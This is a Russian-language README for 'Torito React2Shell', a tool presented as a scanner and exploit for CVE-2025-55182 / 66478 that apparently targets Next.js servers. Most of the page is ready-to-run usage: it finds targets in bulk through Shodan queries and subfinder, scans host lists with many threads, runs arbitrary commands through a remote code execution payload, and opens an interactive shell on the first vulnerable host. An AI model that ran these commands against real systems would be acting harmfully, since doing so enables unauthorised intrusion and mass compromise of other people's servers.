
Torito React2Shell сканер и эксплойт-инструмент (CVE-2025-55182 / 66478)
pip install -r requirements.txtPATH для --subfinder (установка через Homebrew brew install subfinder или Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; проект: https://github.com/projectdiscovery/subfinder)pip install shodan (уже в requirements) и ключа: export SHODAN_API_KEY=... с доступными кредитами запросовpython3 torito_r2s.py --help
Безопасная проверка (одна цель)
python3 torito_r2s.py -u https://target.com
Подтверждение PoC (перенаправление по побочному каналу)
python3 torito_r2s.py -u https://target.com --confirm
Эксплойт с пользовательской командой
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"
Интерактивная оболочка при первом попадании
python3 torito_r2s.py -u https://target.com --shell
Сканирование списка с экспортом
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv
Только Shodan (требуется ключ и кредиты)
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm
Только Subfinder
python3 torito_r2s.py --subfinder target.com --confirm
Прокси (Burp/Caido)
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm
Конвейер через stdin
cat urls.txt | python3 torito_r2s.py --confirm
--exploit-cmd или --shell.| Флаг | Описание | По умолчанию |
|---|
-u, --url URL | URL одной цели | — |
-l, --list FILE | Файл с целями (по одной на строку) | — |
--subfinder DOMAIN | Запустить subfinder для домена и добавить результаты | — |
--shodan QUERY | Поиск Shodan (требуется SHODAN_API_KEY с кредитами) | — |
--shodan-limit N | Макс. результатов Shodan на запрос | 100 |
-t, --threads N | Параллельность | 20 |
--timeout SEC | Таймаут запроса | 10 |
--proxy URL | HTTP/HTTPS прокси | — |
--confirm | Запустить PoC на основе перенаправления после проверки | off |
--exploit-cmd "CMD" | Запустить RCE полезную нагрузку с командой | — |
--shell, -i | Открыть интерактивную оболочку при первом успешном эксплойте (по умолчанию команда id) | off |
--json-out FILE | Сохранить результаты в JSON | — |
--csv-out FILE | Сохранить результаты в CSV | — |
-v, --verbose | Показывать декодированные выводы/диджесты в таблице | off |